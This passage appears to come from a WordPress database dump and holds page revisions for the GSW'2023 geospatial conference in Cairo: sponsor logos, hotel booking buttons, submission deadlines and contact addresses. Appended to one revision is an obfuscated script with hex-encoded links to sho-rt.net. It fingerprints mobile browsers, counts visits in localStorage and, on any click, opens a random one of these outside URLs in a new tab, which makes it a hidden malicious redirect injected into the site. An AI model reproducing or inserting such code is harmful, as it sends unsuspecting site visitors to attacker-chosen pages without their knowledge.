5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 03:01:25','2023-05-18 03:01:25','',3066,'https://gsw2023.com/?p=4554',0,'revision','',0),
(4555,1,'2023-05-18 03:15:19','2023-05-18 03:15:19','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" 